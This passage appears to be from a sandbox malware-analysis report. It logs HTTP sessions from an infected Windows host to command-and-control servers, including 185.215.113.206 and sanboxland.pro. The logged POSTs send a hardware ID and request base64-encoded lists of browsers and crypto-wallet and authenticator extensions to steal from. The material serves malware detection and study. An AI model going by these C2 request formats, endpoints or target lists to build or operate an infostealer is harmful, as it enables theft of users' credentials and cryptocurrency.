Dec 13, 2024 18:54:20.226196051 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 13, 2024 18:54:20.226212978 CET	1236	IN	Data Raw: 09 dd 2b ef c7 6f 5b ce 43 78 7b df db 7f 64 66 40 66 7f 47 5a 24 cd ca 01 09 a2 f6 88 84 cd 22 01 f5 93 40 63 50 4f b9 10 80 86 42 b8 9c dc 8e 2a 67 9e 28 53 ee 46 c1 3f c5 34 80 03 a3 48 87 42 52 03 0d b6 e6 9f ee 82 76 47 18 1f 88 31 43 51 b4 Data Ascii: +o[Cx{df@fGZ$"@cPOB*g(SF?4HBRvG1CQj%AJi=a~^dd@Z@rSrG:~D~J>GH9XshZmy?=RdMn]0?qIOjDTp>[DlgGryW9SCFap,H}pZ>mTmMFv>BTI9f(J6=waf%
Dec 13, 2024 18:54:20.226229906 CET	1236	IN	Data Raw: 85 c9 6d aa 8a b5 31 39 c1 79 7f 00 87 96 20 82 17 c2 79 a0 c6 b4 a4 c0 75 e7 56 6d 27 b5 1a 49 c0 7d 55 82 d2 b7 fb 42 78 b0 c8 89 7f a9 fe 7d 06 80 8a 8c fc 56 61 2a 87 06 49 16 8e 19 db 83 88 0b 4b dd ca 9e 75 89 0c 72 83 e8 a1 16 de dd 47 03 Data Ascii: m19y yuVm'I}UBx}Va*IKurGhK.(#Lu.H"lT60{&mjax`k^`l_Y+YLN8OZn-m")%S_DgNvb}:{YI'y+Z8GLpv
Dec 13, 2024 18:54:20.346513033 CET	1236	IN	Data Raw: 7e 81 92 c6 53 b7 9d 44 81 03 14 83 4b b8 02 8b a8 77 cd f3 a2 6d 1c 6a 5e 1d c1 54 8c d5 9e 0f bf c4 e1 5e 44 ef d8 81 45 d0 cc 8a 3e bf 81 ab ae c1 c5 7f 74 a9 e1 8e c7 31 5c e9 c6 a0 c8 6f 61 8a 46 b2 a7 6c d0 9b d1 c6 41 9f 72 40 4e aa b0 cd Data Ascii: ~SDKwmj^T^DE>t1\oaFlAr@NgUliPLL}}B-Vrq}E\|cZiYp'7VP]ZIe=iS_}LzjJ~SlYZm;l

Session ID	Source IP	Source Port	Destination IP	Destination Port
18	192.168.2.7	50011	89.35.131.209	80

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:54:21.929899931 CET	161	OUT	POST /3ofn3jf3e2ljk/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: sanboxland.pro Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 18:54:23.180233002 CET	197	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:54:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 8 <c>3<d>0
Dec 13, 2024 18:54:24.745379925 CET	321	OUT	POST /3ofn3jf3e2ljk/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: sanboxland.pro Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 45 36 31 31 36 44 30 38 39 33 37 30 39 35 36 46 31 45 44 46 46 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 31 45 41 42 42 46 45 39 41 32 45 45 45 45 41 34 44 34 39 46 31 33 44 35 34 38 30 33 42 42 42 37 36 45 37 31 39 39 30 30 32 44 42 43 43 30 43 42 39 35 33 31 30 34 45 42 36 46 44 42 30 33 32 30 43 43 35 46 33 38 42 43 46 44 45 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FE6116D089370956F1EDFF6102794AFA17E4CADC3DDBE1EABBFE9A2EEEEA4D49F13D54803BBB76E7199002DBCC0CB953104EB6FDB0320CC5F38BCFDE
Dec 13, 2024 18:54:25.171854973 CET	312	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:54:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 61 0d 0a 20 3c 63 3e 31 30 30 30 30 35 38 30 31 31 31 2b 2b 2b 65 33 65 37 36 64 63 34 65 61 33 33 65 34 34 39 33 31 36 36 63 30 30 31 34 65 33 34 37 39 37 30 62 64 35 63 65 36 38 66 66 37 37 61 30 33 64 64 64 66 33 30 34 65 34 64 65 37 65 31 66 33 37 63 31 30 33 31 35 34 66 64 30 62 62 32 39 61 39 33 33 62 39 39 61 35 61 30 65 32 66 65 65 34 37 39 62 30 62 33 23 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7a <c>10000580111+++e3e76dc4ea33e4493166c0014e347970bd5ce68ff77a03dddf304e4de7e1f37c103154fd0bb29a933b99a5a0e2fee479b0b3#<d>0
Dec 13, 2024 18:54:29.902851105 CET	190	OUT	POST /3ofn3jf3e2ljk/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: sanboxland.pro Content-Length: 32 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 30 35 38 30 31 31 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10000580111&unit=246122658369
Dec 13, 2024 18:54:30.326314926 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:54:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.7	50018	185.215.113.206	80	6008	C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:54:23.968020916 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Dec 13, 2024 18:54:25.314997911 CET	203	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 17:54:25 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 13, 2024 18:54:25.327534914 CET	413	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AKJDGIEHCAEHIEBFBKKK Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 4b 4a 44 47 49 45 48 43 41 45 48 49 45 42 46 42 4b 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 33 37 30 30 39 37 31 45 35 38 41 33 37 38 38 39 35 32 38 38 32 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 44 47 49 45 48 43 41 45 48 49 45 42 46 42 4b 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 44 47 49 45 48 43 41 45 48 49 45 42 46 42 4b 4b 4b 2d 2d 0d 0a Data Ascii: ------AKJDGIEHCAEHIEBFBKKKContent-Disposition: form-data; name="hwid"83700971E58A3788952882------AKJDGIEHCAEHIEBFBKKKContent-Disposition: form-data; name="build"stok------AKJDGIEHCAEHIEBFBKKK--
Dec 13, 2024 18:54:25.791023016 CET	407	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 17:54:25 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 180 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 4d 57 55 35 5a 44 6b 77 5a 6d 4d 7a 4f 47 45 77 4d 44 4d 32 4d 6d 4e 69 4f 44 49 7a 4d 7a 45 32 4f 47 55 32 4d 7a 5a 6c 4e 7a 6b 34 4e 47 46 6d 4f 44 6b 77 4e 54 59 7a 4e 57 4d 78 4d 44 4d 78 59 57 4d 34 5a 6d 51 77 4f 44 59 79 4f 44 42 6a 4d 6a 46 69 59 54 51 78 4f 44 6c 69 59 54 59 30 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d Data Ascii: MWU5ZDkwZmMzOGEwMDM2MmNiODIzMzE2OGU2MzZlNzk4NGFmODkwNTYzNWMxMDMxYWM4ZmQwODYyODBjMjFiYTQxODliYTY0fHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
Dec 13, 2024 18:54:25.856321096 CET	470	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IECGHJKKJDHIEBFHCAKE Host: 185.215.113.206 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 45 43 47 48 4a 4b 4b 4a 44 48 49 45 42 46 48 43 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 65 39 64 39 30 66 63 33 38 61 30 30 33 36 32 63 62 38 32 33 33 31 36 38 65 36 33 36 65 37 39 38 34 61 66 38 39 30 35 36 33 35 63 31 30 33 31 61 63 38 66 64 30 38 36 32 38 30 63 32 31 62 61 34 31 38 39 62 61 36 34 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 47 48 4a 4b 4b 4a 44 48 49 45 42 46 48 43 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 47 48 4a 4b 4b 4a 44 48 49 45 42 46 48 43 41 4b 45 2d 2d 0d 0a Data Ascii: ------IECGHJKKJDHIEBFHCAKEContent-Disposition: form-data; name="token"1e9d90fc38a00362cb8233168e636e7984af8905635c1031ac8fd086280c21ba4189ba64------IECGHJKKJDHIEBFHCAKEContent-Disposition: form-data; name="message"browsers------IECGHJKKJDHIEBFHCAKE--
Dec 13, 2024 18:54:26.303982019 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 17:54:26 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 2028 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 51 7a 70 63 55 48 4a 76 5a 33 4a 68 62 53 42 47 61 57 78 6c 63 31 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 58 45 46 77 63 47 78 70 59 32 46 30 61 57 39 75 58 48 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 44 42 38 51 32 68 79 62 32 31 70 64 57 31 38 58 45 4e 6f 63 6d 39 74 61 58 56 74 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 77 77 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 4d 48 [TRUNCATED] Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8QzpcUHJvZ3JhbSBGaWxlc1xHb29nbGVcQ2hyb21lXEFwcGxpY2F0aW9uXHxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfDB8Q2hyb21pdW18XENocm9taXVtXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXwwfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8MHxUb3JjaHxcVG9yY2hcVXNlciBEYXRhfGNocm9tZXwwfDB8Vml2YWxkaXxcVml2YWxkaVxVc2VyIERhdGF8Y2hyb21lfHZpdmFsZGkuZXhlfCVMT0NBTEFQUERBVEElXFZpdmFsZGlcQXBwbGljYXRpb25cfENvbW9kbyBEcmFnb258XENvbW9kb1xEcmFnb25cVXNlciBEYXRhfGNocm9tZXwwfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGVwaWMuZXhlfCVMT0NBTEFQUERBVEElXEVwaWMgUHJpdmFjeSBCcm93c2VyXEFwcGxpY2F0aW9uXHxDb2NDb2N8XENvY0NvY1xCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8YnJvd3Nlci5leGV8QzpcUHJvZ3JhbSBGaWxlc1xDb2NDb2NcQnJvd3NlclxBcHBsaWNhdGlvblx8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDOlxQcm9ncmFtIEZpbGVzXEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxBcHBsaWNhdGlvblx8Q2Vu
Dec 13, 2024 18:54:26.304003000 CET	1020	IN	Data Raw: 64 43 42 43 63 6d 39 33 63 32 56 79 66 46 78 44 5a 57 35 30 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 4a 55 78 50 51 30 46 4d 51 56 42 51 52 45 Data Ascii: dCBCcm93c2VyfFxDZW50QnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8JUxPQ0FMQVBQREFUQSVcQ2VudEJyb3dzZXJcQXBwbGljYXRpb25cfDdTdGFyfFw3U3Rhclw3U3RhclxVc2VyIERhdGF8Y2hyb21lfDB8MHxDaGVkb3QgQnJvd3NlcnxcQ2hlZG90XFVzZXIgRGF0YXxjaHJvbWV8MHwwfE1pY3Jvc29
Dec 13, 2024 18:54:26.322844982 CET	469	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHCFBFBAEBKJKEBGCAEH Host: 185.215.113.206 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 48 43 46 42 46 42 41 45 42 4b 4a 4b 45 42 47 43 41 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 65 39 64 39 30 66 63 33 38 61 30 30 33 36 32 63 62 38 32 33 33 31 36 38 65 36 33 36 65 37 39 38 34 61 66 38 39 30 35 36 33 35 63 31 30 33 31 61 63 38 66 64 30 38 36 32 38 30 63 32 31 62 61 34 31 38 39 62 61 36 34 0d 0a 2d 2d 2d 2d 2d 2d 45 48 43 46 42 46 42 41 45 42 4b 4a 4b 45 42 47 43 41 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 45 48 43 46 42 46 42 41 45 42 4b 4a 4b 45 42 47 43 41 45 48 2d 2d 0d 0a Data Ascii: ------EHCFBFBAEBKJKEBGCAEHContent-Disposition: form-data; name="token"1e9d90fc38a00362cb8233168e636e7984af8905635c1031ac8fd086280c21ba4189ba64------EHCFBFBAEBKJKEBGCAEHContent-Disposition: form-data; name="message"plugins------EHCFBFBAEBKJKEBGCAEH--
Dec 13, 2024 18:54:26.770209074 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 17:54:26 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 7116 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
Dec 13, 2024 18:54:26.770366907 CET	1236	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29
Dec 13, 2024 18:54:26.770380974 CET	1236	IN	Data Raw: 66 47 52 75 5a 32 31 73 59 6d 78 6a 62 32 52 6d 62 32 4a 77 5a 48 42 6c 59 32 46 68 5a 47 64 6d 59 6d 4e 6e 5a 32 5a 71 5a 6d 35 74 66 44 46 38 4d 48 77 77 66 45 74 6c 5a 58 42 6c 63 69 42 58 59 57 78 73 5a 58 52 38 62 48 42 70 62 47 4a 75 61 57 Data Ascii: fGRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfDF8MHwwfEtlZXBlciBXYWxsZXR8bHBpbGJuaWlhYmFja2RqY2lvbmtvYmdsbWRkZmJjam98MXwwfDB8U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWd
Dec 13, 2024 18:54:26.770569086 CET	372	IN	Data Raw: 49 45 46 77 64 47 39 7a 49 46 64 68 62 47 78 6c 64 48 78 77 61 47 74 69 59 57 31 6c 5a 6d 6c 75 5a 32 64 74 59 57 74 6e 61 32 78 77 61 32 78 71 61 6d 31 6e 61 57 4a 76 61 47 35 69 59 58 77 78 66 44 42 38 4d 48 78 51 5a 58 52 79 59 53 42 42 63 48 Data Ascii: IEFwdG9zIFdhbGxldHxwaGtiYW1lZmluZ2dtYWtna2xwa2xqam1naWJvaG5iYXwxfDB8MHxQZXRyYSBBcHRvcyBXYWxsZXR8ZWpqbGFkaW5uY2tkZ2plbWVrZWJkcGVva2Jpa2hmY2l8MXwwfDB8TWFydGlhbiBBcHRvcyBXYWxsZXR8ZWZiZ2xnb2ZvaXBwYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWt
Dec 13, 2024 18:54:26.770715952 CET	1236	IN	Data Raw: 63 69 42 51 59 58 4e 7a 64 32 39 79 5a 43 42 4e 59 57 35 68 5a 32 56 79 66 47 6c 74 62 47 39 70 5a 6d 74 6e 61 6d 46 6e 5a 32 68 75 62 6d 4e 71 61 32 68 6e 5a 32 52 6f 59 57 78 74 59 32 35 6d 61 32 78 72 66 44 46 38 4d 48 77 77 66 45 46 31 64 47 Data Ascii: ciBQYXNzd29yZCBNYW5hZ2VyfGltbG9pZmtnamFnZ2hubmNqa2hnZ2RoYWxtY25ma2xrfDF8MHwwfEF1dGhlbnRpY2F0b3J8YmhnaG9hbWFwY2RwYm9ocGhpZ29vb2FkZGlucGtiYWl8MXwwfDB8QXV0aHl8Z2FlZG1qZGZtbWFoaGJqZWZjYmdhb2xoaGFubGFvbGJ8MXwwfDB8RU9TIEF1dGhlbnRpY2F0b3J8b2VsamRsZHB
Dec 13, 2024 18:54:26.770860910 CET	1236	IN	Data Raw: 61 47 52 6a 62 32 35 6b 59 6d 4e 69 5a 47 35 69 5a 57 56 77 63 47 64 6b 63 47 68 38 4d 58 77 77 66 44 42 38 55 6d 6c 7a 5a 53 41 74 49 45 46 77 64 47 39 7a 49 46 64 68 62 47 78 6c 64 48 78 6f 59 6d 4a 6e 59 6d 56 77 61 47 64 76 61 6d 6c 72 59 57 Data Ascii: aGRjb25kYmNiZG5iZWVwcGdkcGh8MXwwfDB8UmlzZSAtIEFwdG9zIFdhbGxldHxoYmJnYmVwaGdvamlrYWpoZmJvbWhsbW1vbGxwaGNhZHwxfDB8MHxSYWluYm93IFdhbGxldHxvcGZnZWxtY21iaWFqYW1lcG5tbG9pamJwb2xlaWFtYXwxfDB8MHxOaWdodGx5IFdhbGxldHxmaWlrb21tZGRiZWNjYW9pY29lam9uaWFtbW5
Dec 13, 2024 18:54:26.778657913 CET	792	IN	Data Raw: 62 47 56 30 66 47 39 71 5a 32 64 74 59 32 68 73 5a 32 68 75 61 6d 78 68 63 47 31 6d 59 6d 35 71 61 47 39 73 5a 6d 70 72 61 57 6c 6b 59 6d 4e 6f 66 44 46 38 4d 48 77 77 66 46 42 31 62 48 4e 6c 49 46 64 68 62 47 78 6c 64 43 42 44 61 48 4a 76 62 57 Data Ascii: bGV0fG9qZ2dtY2hsZ2huamxhcG1mYm5qaG9sZmpraWlkYmNofDF8MHwwfFB1bHNlIFdhbGxldCBDaHJvbWl1bXxjaW9qb2Nwa2NsZmZsb21iYmNmaWdjaWpqY2JrbWhhZnwxfDB8MHxNYWdpYyBFZGVuIFdhbGxldHxta3BlZ2prYmxra2VmYWNmbm1rYWpjam1hYmlqaGNsZ3wxfDB8MHxCYWNrcGFjayBXYWxsZXR8YWZsa21
Dec 13, 2024 18:54:26.804968119 CET	470	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIJJKKJJDAAAAAKFHJJD Host: 185.215.113.206 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 65 39 64 39 30 66 63 33 38 61 30 30 33 36 32 63 62 38 32 33 33 31 36 38 65 36 33 36 65 37 39 38 34 61 66 38 39 30 35 36 33 35 63 31 30 33 31 61 63 38 66 64 30 38 36 32 38 30 63 32 31 62 61 34 31 38 39 62 61 36 34 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 44 2d 2d 0d 0a Data Ascii: ------GIJJKKJJDAAAAAKFHJJDContent-Disposition: form-data; name="token"1e9d90fc38a00362cb8233168e636e7984af8905635c1031ac8fd086280c21ba4189ba64------GIJJKKJJDAAAAAKFHJJDContent-Disposition: form-data; name="message"fplugins------GIJJKKJJDAAAAAKFHJJD--
